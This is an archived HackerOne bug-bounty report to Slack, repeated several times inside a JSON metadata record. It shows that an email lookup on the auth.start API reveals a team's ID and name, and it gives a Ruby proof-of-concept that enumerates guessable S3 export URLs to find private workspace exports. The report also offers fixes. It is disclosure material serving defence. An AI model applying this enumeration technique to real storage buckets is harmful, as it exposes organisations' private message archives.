The information an attacker needs, is the team its name and ID (the date needs to be enumerated). The information can be obtained due to a minor issue in the API (authentication). The following steps can be used to reproduce the issue.

Step 1: obtain team ID and team name

The team ID and team name can be obtained by abusing some minor information leakage in the auth.start API call. The following request and response give an example.

As can be seen in the JSON response, it contains the team ID (T0254389F) and a name (HackerOne) we need for the download links.

Step 2: scrape S3

I wrote a rough PoC that scrapes S3 and shows the found exports (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name I mentioned before to check it out).

To avoid these kind of issues, you could generate a link that expires within a certain amount of time (let's say, &lt;time-export-completed&gt;+30m) or use random values in the filename if expiring is not an option (make sure you don't solely rely on "public domain info").

All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018

Protected by

{"id": "H1:2746", "hash": "79d8b7e0c89ad384b17af78689493e5a", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Slack: Data exports stored on S3 can be scraped easily", "description": "The URLs that are used to download the exports can be guessed easily by an attacker. The location of the export file is based on a date, a team ID and a team name:\r\n\r\n```\r\nhttp://s3-us-west-2.amazonaws.com/slack-files2/<team_id>/export/<date>/<name>%20Slack%20export%20<date>.zip\r\n```\r\n\r\nThe information an attacker needs, is the team its name and ID (the date needs to be enumerated). The information can be obtained due to a minor issue in the API (authentication). The following steps can be used to reproduce the issue.\r\n\r\n#Step 1: obtain team ID and team name\r\nThe team ID and team name can be obtained by abusing some minor information leakage in the `auth.start` API call. The following request and response give an example.\r\n\r\n**Request**\r\n\r\n```\r\nPOST /api/auth.start HTTP/1.1\r\n...\r\n\r\nemail=jobert@hackerone.com\r\n```\r\n\r\n**Response**\r\n\r\n```\r\nHTTP/1.1 200 OK\r\n...\r\n\r\n{\"ok\":true,\"email\":\"jobert@hackerone.com\",\"domain\":\"hackerone.com\",\"users\":[{\"url\":\"https:\\/\\/hackerone.slack.com\\/\",\"team\":\"HackerOne\",\"user\":\"jobert\",\"team_id\":\"T0254389F\",\"user_id\":\"U0254GYNR\"}],\"teams\":[],\"create\":\"https:\\/\\/slack.com\\/create?email=jobert%40hackerone.com\"}\r\n```\r\n\r\nAs can be seen in the JSON response, it contains the team ID (`T0254389F`) and a name (`HackerOne`) we need for the download links.\r\n\r\n#Step 2: scrape S3\r\nI wrote a rough PoC that scrapes S3 and shows the found exports (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name I mentioned before to check it out). \r\n\r\n``` ruby\r\nrequire 'date'\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nteam_id = ARGV[0]\r\nteam_name = ARGV[1]\r\n\r\ndef create_export_url(team_id, team_name, date)\r\n date_dir = date.strftime '%Y-%m-%d'\r\n date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'\r\n\r\n \"http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/\"\\\r\n \"export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip\"\r\nend\r\n\r\ndate = Date.parse 'March 2nd, 2014'\r\n\r\n365.times do\r\n uri = URI create_export_url(team_id, team_name, date)\r\n response = Net::HTTP.get_response uri\r\n\r\n if response.is_a? Net::HTTPOK\r\n puts \"FOUND AN EXPORT: #{uri}\"\r\n end\r\n\r\n date -= 1\r\nend\r\n```\r\n\r\nTo avoid these kind of issues, you could generate a link that [expires within a certain amount](http://css-tricks.com/snippets/php/generate-expiring-amazon-s3-link/) of time (let's say, `<time-export-completed>+30m`) or use random values in the filename if expiring is not an option (make sure you don't solely rely on \"public domain info\").", "published": "2014-03-02T20:57:39", "modified": "2014-12-09T20:34:59", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/2746", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2019-01-28T18:19:20", "history": [{"bulletin": {"id": "H1:2746", "hash": "b4c968522269c9733e1aa5ff86d8d542ddd2a8ff88183559e306b8fa3b028511", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Slack: Data exports stored on S3 can be scraped easily", "description": "The URLs that are used to download the exports can be guessed easily by an attacker. The location of the export file is based on a date, a team ID and a team name:\r\n\r\n```\r\nhttp://s3-us-west-2.amazonaws.com/slack-files2/<team_id>/export/<date>/<name>%20Slack%20export%20<date>.zip\r\n```\r\n\r\nThe information an attacker needs, is the team its name and ID (the date needs to be enumerated). The information can be obtained due to a minor issue in the API (authentication). The following steps can be used to reproduce the issue.\r\n\r\n#Step 1: obtain team ID and team name\r\nThe team ID and team name can be obtained by abusing some minor information leakage in the `auth.start` API call. The following request and response give an example.\r\n\r\n**Request**\r\n\r\n```\r\nPOST /api/auth.start HTTP/1.1\r\n...\r\n\r\nemail=jobert@hackerone.com\r\n```\r\n\r\n**Response**\r\n\r\n```\r\nHTTP/1.1 200 OK\r\n...\r\n\r\n{\"ok\":true,\"email\":\"jobert@hackerone.com\",\"domain\":\"hackerone.com\",\"users\":[{\"url\":\"https:\\/\\/hackerone.slack.com\\/\",\"team\":\"HackerOne\",\"user\":\"jobert\",\"team_id\":\"T0254389F\",\"user_id\":\"U0254GYNR\"}],\"teams\":[],\"create\":\"https:\\/\\/slack.com\\/create?email=jobert%40hackerone.com\"}\r\n```\r\n\r\nAs can be seen in the JSON response, it contains the team ID (`T0254389F`) and a name (`HackerOne`) we need for the download links.\r\n\r\n#Step 2: scrape S3\r\nI wrote a rough PoC that scrapes S3 and shows the found exports (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name I mentioned before to check it out). \r\n\r\n``` ruby\r\nrequire 'date'\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nteam_id = ARGV[0]\r\nteam_name = ARGV[1]\r\n\r\ndef create_export_url(team_id, team_name, date)\r\n date_dir = date.strftime '%Y-%m-%d'\r\n date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'\r\n\r\n \"http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/\"\\\r\n \"export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip\"\r\nend\r\n\r\ndate = Date.parse 'March 2nd, 2014'\r\n\r\n365.times do\r\n uri = URI create_export_url(team_id, team_name, date)\r\n response = Net::HTTP.get_response uri\r\n\r\n if response.is_a? Net::HTTPOK\r\n puts \"FOUND AN EXPORT: #{uri}\"\r\n end\r\n\r\n date -= 1\r\nend\r\n```\r\n\r\nTo avoid these kind of issues, you could generate a link that [expires within a certain amount](http://css-tricks.com/snippets/php/generate-expiring-amazon-s3-link/) of time (let's say, `<time-export-completed>+30m`) or use random values in the filename if expiring is not an option (make sure you don't solely rely on \"public domain info\").", "published": "2014-03-02T20:57:39", "modified": "2014-12-09T20:34:59", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/2746", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2018-04-19T17:34:11", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "slack", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/000/069/50cfd8e05b18bade214847ec5f61dcb9e6c85fa9_medium.png?1449082084", "small": "https://profile-photos.hackerone-user-content.com/000/000/069/a44d7bfd843f514c723441a5a40daf5bac8e9e38_small.png?1449082084"}, "url": "https://hackerone.com/slack"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "hackerone_triager": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}}, "differentElements": ["h1team"], "edition": 5, "lastseen": "2018-04-19T17:34:11"}, {"bulletin": {"id": "H1:2746", "hash": "cd03dff79af0cf686b711f5a275991be2d5a89424128fa6e93e5a291ac7e90df", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Slack: Data exports stored on S3 can be scraped easily", "description": "The URLs that are used to download the exports can be guessed easily by an attacker. The location of the export file is based on a date, a team ID and a team name:\r\n\r\n```\r\nhttp://s3-us-west-2.amazonaws.com/slack-files2/<team_id>/export/<date>/<name>%20Slack%20export%20<date>.zip\r\n```\r\n\r\nThe information an attacker needs, is the team its name and ID (the date needs to be enumerated). The information can be obtained due to a minor issue in the API (authentication). The following steps can be used to reproduce the issue.\r\n\r\n#Step 1: obtain team ID and team name\r\nThe team ID and team name can be obtained by abusing some minor information leakage in the `auth.start` API call. The following request and response give an example.\r\n\r\n**Request**\r\n\r\n```\r\nPOST /api/auth.start HTTP/1.1\r\n...\r\n\r\nemail=jobert@hackerone.com\r\n```\r\n\r\n**Response**\r\n\r\n```\r\nHTTP/1.1 200 OK\r\n...\r\n\r\n{\"ok\":true,\"email\":\"jobert@hackerone.com\",\"domain\":\"hackerone.com\",\"users\":[{\"url\":\"https:\\/\\/hackerone.slack.com\\/\",\"team\":\"HackerOne\",\"user\":\"jobert\",\"team_id\":\"T0254389F\",\"user_id\":\"U0254GYNR\"}],\"teams\":[],\"create\":\"https:\\/\\/slack.com\\/create?email=jobert%40hackerone.com\"}\r\n```\r\n\r\nAs can be seen in the JSON response, it contains the team ID (`T0254389F`) and a name (`HackerOne`) we need for the download links.\r\n\r\n#Step 2: scrape S3\r\nI wrote a rough PoC that scrapes S3 and shows the found exports (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name I mentioned before to check it out). \r\n\r\n``` ruby\r\nrequire 'date'\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nteam_id = ARGV[0]\r\nteam_name = ARGV[1]\r\n\r\ndef create_export_url(team_id, team_name, date)\r\n date_dir = date.strftime '%Y-%m-%d'\r\n date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'\r\n\r\n \"http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/\"\\\r\n \"export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip\"\r\nend\r\n\r\ndate = Date.parse 'March 2nd, 2014'\r\n\r\n365.times do\r\n uri = URI create_export_url(team_id, team_name, date)\r\n response = Net::HTTP.get_response uri\r\n\r\n if response.is_a? Net::HTTPOK\r\n puts \"FOUND AN EXPORT: #{uri}\"\r\n end\r\n\r\n date -= 1\r\nend\r\n```\r\n\r\nTo avoid these kind of issues, you could generate a link that [expires within a certain amount](http://css-tricks.com/snippets/php/generate-expiring-amazon-s3-link/) of time (let's say, `<time-export-completed>+30m`) or use random values in the filename if expiring is not an option (make sure you don't solely rely on \"public domain info\").", "published": "2014-03-02T20:57:39", "modified": "2014-12-09T20:34:59", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/2746", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2017-08-29T13:11:25", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2017-08-29T13:11:25", "value": 6.4}}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "slack", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/production/000/000/069/50cfd8e05b18bade214847ec5f61dcb9e6c85fa9_medium.png?1449082084", "small": "https://profile-photos.hackerone-user-content.com/production/000/000/069/a44d7bfd843f514c723441a5a40daf5bac8e9e38_small.png?1449082084"}, "url": "https://hackerone.com/slack"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}}, "differentElements": ["h1reporter"], "edition": 3, "lastseen": "2017-08-29T13:11:25"}, {"bulletin": {"id": "H1:2746", "hash": "b0b37b5a748660f6f1f9b6e32ac0979710e55074b69d511cea326d5926c71cb6", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Slack: Data exports stored on S3 can be scraped easily", "description": "The URLs that are used to download the exports can be guessed easily by an attacker. The location of the export file is based on a date, a team ID and a team name:\r\n\r\n```\r\nhttp://s3-us-west-2.amazonaws.com/slack-files2/<team_id>/export/<date>/<name>%20Slack%20export%20<date>.zip\r\n```\r\n\r\nThe information an attacker needs, is the team its name and ID (the date needs to be enumerated). The information can be obtained due to a minor issue in the API (authentication). The following steps can be used to reproduce the issue.\r\n\r\n#Step 1: obtain team ID and team name\r\nThe team ID and team name can be obtained by abusing some minor information leakage in the `auth.start` API call. The following request and response give an example.\r\n\r\n**Request**\r\n\r\n```\r\nPOST /api/auth.start HTTP/1.1\r\n...\r\n\r\nemail=jobert@hackerone.com\r\n```\r\n\r\n**Response**\r\n\r\n```\r\nHTTP/1.1 200 OK\r\n...\r\n\r\n{\"ok\":true,\"email\":\"jobert@hackerone.com\",\"domain\":\"hackerone.com\",\"users\":[{\"url\":\"https:\\/\\/hackerone.slack.com\\/\",\"team\":\"HackerOne\",\"user\":\"jobert\",\"team_id\":\"T0254389F\",\"user_id\":\"U0254GYNR\"}],\"teams\":[],\"create\":\"https:\\/\\/slack.com\\/create?email=jobert%40hackerone.com\"}\r\n```\r\n\r\nAs can be seen in the JSON response, it contains the team ID (`T0254389F`) and a name (`HackerOne`) we need for the download links.\r\n\r\n#Step 2: scrape S3\r\nI wrote a rough PoC that scrapes S3 and shows the found exports (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name I mentioned before to check it out). \r\n\r\n``` ruby\r\nrequire 'date'\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nteam_id = ARGV[0]\r\nteam_name = ARGV[1]\r\n\r\ndef create_export_url(team_id, team_name, date)\r\n date_dir = date.strftime '%Y-%m-%d'\r\n date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'\r\n\r\n \"http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/\"\\\r\n \"export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip\"\r\nend\r\n\r\ndate = Date.parse 'March 2nd, 2014'\r\n\r\n365.times do\r\n uri = URI create_export_url(team_id, team_name, date)\r\n response = Net::HTTP.get_response uri\r\n\r\n if response.is_a? Net::HTTPOK\r\n puts \"FOUND AN EXPORT: #{uri}\"\r\n end\r\n\r\n date -= 1\r\nend\r\n```\r\n\r\nTo avoid these kind of issues, you could generate a link that [expires within a certain amount](http://css-tricks.com/snippets/php/generate-expiring-amazon-s3-link/) of time (let's say, `<time-export-completed>+30m`) or use random values in the filename if expiring is not an option (make sure you don't solely rely on \"public domain info\").", "published": "2014-03-02T20:57:39", "modified": "1970-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/2746", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2017-08-22T11:09:39", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "slack", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/production/000/000/069/50cfd8e05b18bade214847ec5f61dcb9e6c85fa9_medium.png?1449082084", "small": "https://profile-photos.hackerone-user-content.com/production/000/000/069/a44d7bfd843f514c723441a5a40daf5bac8e9e38_small.png?1449082084"}, "url": "https://hackerone.com/slack"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}}, "differentElements": ["h1reporter"], "edition": 1, "lastseen": "2017-08-22T11:09:39"}, {"bulletin": {"id": "H1:2746", "hash": "11e0f64c78316bb1f39d4e7ce05610c9d66f4f9bd14f0e7cb92e6eca149e55e4", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Slack: Data exports stored on S3 can be scraped easily", "description": "The URLs that are used to download the exports can be guessed easily by an attacker. The location of the export file is based on a date, a team ID and a team name:\r\n\r\n```\r\nhttp://s3-us-west-2.amazonaws.com/slack-files2/<team_id>/export/<date>/<name>%20Slack%20export%20<date>.zip\r\n```\r\n\r\nThe information an attacker needs, is the team its name and ID (the date needs to be enumerated). The information can be obtained due to a minor issue in the API (authentication). The following steps can be used to reproduce the issue.\r\n\r\n#Step 1: obtain team ID and team name\r\nThe team ID and team name can be obtained by abusing some minor information leakage in the `auth.start` API call. The following request and response give an example.\r\n\r\n**Request**\r\n\r\n```\r\nPOST /api/auth.start HTTP/1.1\r\n...\r\n\r\nemail=jobert@hackerone.com\r\n```\r\n\r\n**Response**\r\n\r\n```\r\nHTTP/1.1 200 OK\r\n...\r\n\r\n{\"ok\":true,\"email\":\"jobert@hackerone.com\",\"domain\":\"hackerone.com\",\"users\":[{\"url\":\"https:\\/\\/hackerone.slack.com\\/\",\"team\":\"HackerOne\",\"user\":\"jobert\",\"team_id\":\"T0254389F\",\"user_id\":\"U0254GYNR\"}],\"teams\":[],\"create\":\"https:\\/\\/slack.com\\/create?email=jobert%40hackerone.com\"}\r\n```\r\n\r\nAs can be seen in the JSON response, it contains the team ID (`T0254389F`) and a name (`HackerOne`) we need for the download links.\r\n\r\n#Step 2: scrape S3\r\nI wrote a rough PoC that scrapes S3 and shows the found exports (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name I mentioned before to check it out). \r\n\r\n``` ruby\r\nrequire 'date'\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nteam_id = ARGV[0]\r\nteam_name = ARGV[1]\r\n\r\ndef create_export_url(team_id, team_name, date)\r\n date_dir = date.strftime '%Y-%m-%d'\r\n date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'\r\n\r\n \"http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/\"\\\r\n \"export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip\"\r\nend\r\n\r\ndate = Date.parse 'March 2nd, 2014'\r\n\r\n365.times do\r\n uri = URI create_export_url(team_id, team_name, date)\r\n response = Net::HTTP.get_response uri\r\n\r\n if response.is_a? Net::HTTPOK\r\n puts \"FOUND AN EXPORT: #{uri}\"\r\n end\r\n\r\n date -= 1\r\nend\r\n```\r\n\r\nTo avoid these kind of issues, you could generate a link that [expires within a certain amount](http://css-tricks.com/snippets/php/generate-expiring-amazon-s3-link/) of time (let's say, `<time-export-completed>+30m`) or use random values in the filename if expiring is not an option (make sure you don't solely rely on \"public domain info\").", "published": "2014-03-02T20:57:39", "modified": "2014-12-09T20:34:59", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/2746", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2018-02-07T16:57:57", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-07T16:57:57", "value": 3.3, "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "slack", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/production/000/000/069/50cfd8e05b18bade214847ec5f61dcb9e6c85fa9_medium.png?1449082084", "small": "https://profile-photos.hackerone-user-content.com/production/000/000/069/a44d7bfd843f514c723441a5a40daf5bac8e9e38_small.png?1449082084"}, "url": "https://hackerone.com/slack"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "hackerone_triager": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}}, "differentElements": ["h1team", "h1reporter"], "edition": 4, "lastseen": "2018-02-07T16:57:57"}, {"bulletin": {"id": "H1:2746", "hash": "a3e463e5e43bfc9f6d11655ad652c1cf0ab601438c9cba2a3b9361ace8f29856", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Slack: Data exports stored on S3 can be scraped easily", "description": "The URLs that are used to download the exports can be guessed easily by an attacker. The location of the export file is based on a date, a team ID and a team name:\r\n\r\n```\r\nhttp://s3-us-west-2.amazonaws.com/slack-files2/<team_id>/export/<date>/<name>%20Slack%20export%20<date>.zip\r\n```\r\n\r\nThe information an attacker needs, is the team its name and ID (the date needs to be enumerated). The information can be obtained due to a minor issue in the API (authentication). The following steps can be used to reproduce the issue.\r\n\r\n#Step 1: obtain team ID and team name\r\nThe team ID and team name can be obtained by abusing some minor information leakage in the `auth.start` API call. The following request and response give an example.\r\n\r\n**Request**\r\n\r\n```\r\nPOST /api/auth.start HTTP/1.1\r\n...\r\n\r\nemail=jobert@hackerone.com\r\n```\r\n\r\n**Response**\r\n\r\n```\r\nHTTP/1.1 200 OK\r\n...\r\n\r\n{\"ok\":true,\"email\":\"jobert@hackerone.com\",\"domain\":\"hackerone.com\",\"users\":[{\"url\":\"https:\\/\\/hackerone.slack.com\\/\",\"team\":\"HackerOne\",\"user\":\"jobert\",\"team_id\":\"T0254389F\",\"user_id\":\"U0254GYNR\"}],\"teams\":[],\"create\":\"https:\\/\\/slack.com\\/create?email=jobert%40hackerone.com\"}\r\n```\r\n\r\nAs can be seen in the JSON response, it contains the team ID (`T0254389F`) and a name (`HackerOne`) we need for the download links.\r\n\r\n#Step 2: scrape S3\r\nI wrote a rough PoC that scrapes S3 and shows the found exports (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name I mentioned before to check it out). \r\n\r\n``` ruby\r\nrequire 'date'\r\nrequire 'net/http'\r\nrequire 'uri'\r\n\r\nteam_id = ARGV[0]\r\nteam_name = ARGV[1]\r\n\r\ndef create_export_url(team_id, team_name, date)\r\n date_dir = date.strftime '%Y-%m-%d'\r\n date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'\r\n\r\n \"http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/\"\\\r\n \"export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip\"\r\nend\r\n\r\ndate = Date.parse 'March 2nd, 2014'\r\n\r\n365.times do\r\n uri = URI create_export_url(team_id, team_name, date)\r\n response = Net::HTTP.get_response uri\r\n\r\n if response.is_a? Net::HTTPOK\r\n puts \"FOUND AN EXPORT: #{uri}\"\r\n end\r\n\r\n date -= 1\r\nend\r\n```\r\n\r\nTo avoid these kind of issues, you could generate a link that [expires within a certain amount](http://css-tricks.com/snippets/php/generate-expiring-amazon-s3-link/) of time (let's say, `<time-export-completed>+30m`) or use random values in the filename if expiring is not an option (make sure you don't solely rely on \"public domain info\").", "published": "2014-03-02T20:57:39", "modified": "1970-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/2746", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2017-08-28T23:19:24", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "slack", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/production/000/000/069/50cfd8e05b18bade214847ec5f61dcb9e6c85fa9_medium.png?1449082084", "small": "https://profile-photos.hackerone-user-content.com/production/000/000/069/a44d7bfd843f514c723441a5a40daf5bac8e9e38_small.png?1449082084"}, "url": "https://hackerone.com/slack"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/production/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}}, "differentElements": ["modified"], "edition": 2, "lastseen": "2017-08-28T23:19:24"}], "viewCount": 2, "enchantments": {"score": {"value": -0.7, "vector": "NONE", "modified": "2019-01-28T18:19:20"}, "dependencies": {"references": [], "modified": "2019-01-28T18:19:20"}, "vulnersScore": -0.7}, "objectVersion": "1.4", "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "slack", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/000/069/ad6a48f4beaf01758323a1fd58b4fdb9688c4c89_medium.png?1548683356", "small": "https://profile-photos.hackerone-user-content.com/000/000/069/cbd9b79098b895bc1ca6c6d0a1465bc4238d1b62_small.png?1548683356"}, "url": "https://hackerone.com/slack"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "hackerone_triager": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}, "_object_type": "robots.models.hackerone.HackerOneBulletin", "_object_types": ["robots.models.hackerone.HackerOneBulletin", "robots.models.base.Bulletin"]}